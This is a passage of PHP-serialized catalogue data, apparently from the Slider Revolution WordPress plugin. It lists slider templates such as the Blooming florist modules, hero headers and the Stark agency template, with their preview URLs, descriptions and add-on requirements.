Text\";s:5:\"alias\";s:21:\"blooming-wedding-text\";s:3:\"zip\";s:31:\"packs/blooming-wedding-text.zip\";s:3:\"uid\";s:32:\"326f2793294a739dd3aac3cc45332df8\";s:3:\"img\";s:32:\"blooming-wedding-text/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:419;a:25:{s:2:\"id\";s:3:\"455\";s:5:\"title\";s:22:\"Blooming Parties Title\";s:5:\"alias\";s:22:\"blooming-parties-title\";s:3:\"zip\";s:32:\"packs/blooming-parties-title.zip\";s:3:\"uid\";s:32:\"b47aae1b368d3c3d9017f260e6c6a547\";s:3:\"img\";s:33:\"blooming-parties-title/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:420;a:25:{s:2:\"id\";s:3:\"456\";s:5:\"title\";s:25:\"Blooming Parties Carousel\";s:5:\"alias\";s:25:\"blooming-parties-carousel\";s:3:\"zip\";s:35:\"packs/blooming-parties-carousel.zip\";s:3:\"uid\";s:32:\"9f90a9da7b017aeee7f3b608cda066e6\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:421;a:25:{s:2:\"id\";s:3:\"457\";s:5:\"title\";s:21:\"Blooming Parties Text\";s:5:\"alias\";s:21:\"blooming-parties-text\";s:3:\"zip\";s:31:\"packs/blooming-parties-text.zip\";s:3:\"uid\";s:32:\"66a47346cc639b8b9b9b5dfa1521b6ef\";s:3:\"img\";s:32:\"blooming-parties-text/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:422;a:25:{s:2:\"id\";s:3:\"458\";s:5:\"title\";s:22:\"Blooming Funeral Title\";s:5:\"alias\";s:22:\"blooming-funeral-title\";s:3:\"zip\";s:32:\"packs/blooming-funeral-title.zip\";s:3:\"uid\";s:32:\"e9e77134472c33c56be442073f29d1fd\";s:3:\"img\";s:33:\"blooming-funeral-title/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:423;a:25:{s:2:\"id\";s:3:\"459\";s:5:\"title\";s:23:\"Blooming Funeral Slider\";s:5:\"alias\";s:23:\"blooming-funeral-slider\";s:3:\"zip\";s:33:\"packs/blooming-funeral-slider.zip\";s:3:\"uid\";s:32:\"d15090841c25c7c8f0e1b0987c0c0887\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:2:\"11\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:424;a:25:{s:2:\"id\";s:3:\"460\";s:5:\"title\";s:21:\"Blooming Funeral Text\";s:5:\"alias\";s:21:\"blooming-funeral-text\";s:3:\"zip\";s:31:\"packs/blooming-funeral-text.zip\";s:3:\"uid\";s:32:\"d7c80e246f31e3d2f4e5dc1656f133cc\";s:3:\"img\";s:32:\"blooming-funeral-text/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:2:\"12\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:425;a:25:{s:2:\"id\";s:3:\"461\";s:5:\"title\";s:16:\"Blooming Contact\";s:5:\"alias\";s:16:\"blooming-contact\";s:3:\"zip\";s:26:\"packs/blooming-contact.zip\";s:3:\"uid\";s:32:\"54280182bca86443e2648b3146f41e47\";s:3:\"img\";s:27:\"blooming-contact/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:2:\"13\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:426;a:22:{s:2:\"id\";s:3:\"462\";s:5:\"title\";s:13:\"Particle Hero\";s:5:\"alias\";s:13:\"particle-hero\";s:3:\"zip\";s:17:\"particle-hero.zip\";s:3:\"uid\";s:32:\"3f422f4807bf9ef4cb15dade515dad00\";s:3:\"img\";s:24:\"particle-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide6\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:120:\"<span class=\"ttm_content\">A Hero header module using the Particle Effect Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:427;a:22:{s:2:\"id\";s:3:\"463\";s:5:\"title\";s:17:\"Bubble Morph Hero\";s:5:\"alias\";s:17:\"bubble-morph-hero\";s:3:\"zip\";s:21:\"bubble-morph-hero.zip\";s:3:\"uid\";s:32:\"b47e6bcc1ae80393ff3f7388ed3b9f8f\";s:3:\"img\";s:28:\"bubble-morph-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide5\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:117:\"<span class=\"ttm_content\">A Hero header module using the Bubble Morph Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:428;a:22:{s:2:\"id\";s:3:\"464\";s:5:\"title\";s:13:\"Parallax Hero\";s:5:\"alias\";s:13:\"parallax-hero\";s:3:\"zip\";s:17:\"parallax-hero.zip\";s:3:\"uid\";s:32:\"290e86534326ee118e96ae7ce0538fa2\";s:3:\"img\";s:24:\"parallax-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide4\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:117:\"<span class=\"ttm_content\">A parallax hero module with mouse move interaction.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:429;a:22:{s:2:\"id\";s:3:\"465\";s:5:\"title\";s:10:\"Video Hero\";s:5:\"alias\";s:10:\"video-hero\";s:3:\"zip\";s:14:\"video-hero.zip\";s:3:\"uid\";s:32:\"f9e280015d3408bb0482e13fe753da8f\";s:3:\"img\";s:21:\"video-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide3\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:111:\"<span class=\"ttm_content\">A simple Hero header module with HTML5 video.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:430;a:22:{s:2:\"id\";s:3:\"466\";s:5:\"title\";s:14:\"Ken Burns Hero\";s:5:\"alias\";s:14:\"ken-burns-hero\";s:3:\"zip\";s:18:\"ken-burns-hero.zip\";s:3:\"uid\";s:32:\"d5f89e5f5b3991b995e2bfeb50cfe9f8\";s:3:\"img\";s:25:\"ken-burns-hero/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/wordpress-hero-image-header/#slide2\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:142:\"<span class=\"ttm_content\">A simple image background hero header module with a subtle Ken Burns effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:431;a:22:{s:2:\"id\";s:3:\"467\";s:5:\"title\";s:21:\"Basic Hero Collection\";s:5:\"alias\";s:21:\"basic-hero-collection\";s:3:\"zip\";s:25:\"basic-hero-collection.zip\";s:3:\"uid\";s:32:\"ff625c65e8aab4689fa56d5652279d51\";s:3:\"img\";s:32:\"basic-hero-collection/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/wordpress-hero-image-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:153:\"<span class=\"ttm_content\">A collection of WordPress Hero Headers with image, video, particles, parallax and more!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:348:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:432;a:22:{s:2:\"id\";s:3:\"468\";s:5:\"title\";s:19:\"Launching Very Soon\";s:5:\"alias\";s:19:\"launching-very-soon\";s:3:\"zip\";s:23:\"launching-very-soon.zip\";s:3:\"uid\";s:32:\"2da45cf2d9bec07e7183b3f7777986b9\";s:3:\"img\";s:30:\"launching-very-soon/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/launching-soon-countdown/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:166:\"<span class=\"ttm_content\">Rocket BOOST! A beautifully animated launching soon countdown module using our \"Coming Soon\" Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:197:\"[{\"path\":\"revslider-maintenance-addon\\/revslider-maintenance-addon.php\",\"name\":\"Coming Soon & Maintenance AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/add-coming-soon-maintenance\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:433;a:22:{s:2:\"id\";s:3:\"469\";s:5:\"title\";s:18:\"Under Construction\";s:5:\"alias\";s:18:\"Under-Construction\";s:3:\"zip\";s:22:\"Under-Construction.zip\";s:3:\"uid\";s:32:\"4b12f9a82a5b48d45a707df93406eb5b\";s:3:\"img\";s:29:\"Under-Construction/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/under-construction/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You will love this animated under construction landing page using our \"Coming Soon\" Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:197:\"[{\"path\":\"revslider-maintenance-addon\\/revslider-maintenance-addon.php\",\"name\":\"Coming Soon & Maintenance AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/add-coming-soon-maintenance\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:434;a:22:{s:2:\"id\";s:3:\"470\";s:5:\"title\";s:15:\"Particle Effect\";s:5:\"alias\";s:15:\"Particle-Effect\";s:3:\"zip\";s:19:\"Particle-Effect.zip\";s:3:\"uid\";s:32:\"66cf4e514e83a6984903694fd587edb6\";s:3:\"img\";s:26:\"Particle-Effect/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/snow-particle-scene/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:140:\"<span class=\"ttm_content\">Get into a winter mood with our Snow Particle Scene for Slider Revolution!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:435;a:22:{s:2:\"id\";s:3:\"471\";s:5:\"title\";s:17:\"Particle Effect 2\";s:5:\"alias\";s:17:\"Particle-Effect-2\";s:3:\"zip\";s:21:\"Particle-Effect-2.zip\";s:3:\"uid\";s:32:\"303337c29a97a816ccecca7e5f0b5e20\";s:3:\"img\";s:28:\"Particle-Effect-2/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/cyber-particle-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:147:\"<span class=\"ttm_content\">Amaze your website visitors with the cyber particle effect for Slider Revolution!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:436;a:25:{s:2:\"id\";s:3:\"472\";s:5:\"title\";s:22:\"Stark Website Template\";s:5:\"alias\";s:22:\"stark-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:30:\"stark-website-template-package\";s:3:\"img\";s:43:\"packages/stark-website-template-package.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:437;a:25:{s:2:\"id\";s:3:\"473\";s:5:\"title\";s:10:\"Stark Menu\";s:5:\"alias\";s:10:\"stark-menu\";s:3:\"zip\";s:20:\"packs/stark-menu.zip\";s:3:\"uid\";s:32:\"bb31150df180e784d76a1f5ea306bf05\";s:3:\"img\";s:21:\"stark-menu/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:87:\"offset=\"t:0px,0px,0px,0px;b:0px,0px,0px,0px;l:140px,70px,0px,0px;r:140px,70px,0px,0px;\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:438;a:25:{s:2:\"id\";s:3:\"474\";s:5:\"title\";s:12:\"Stark 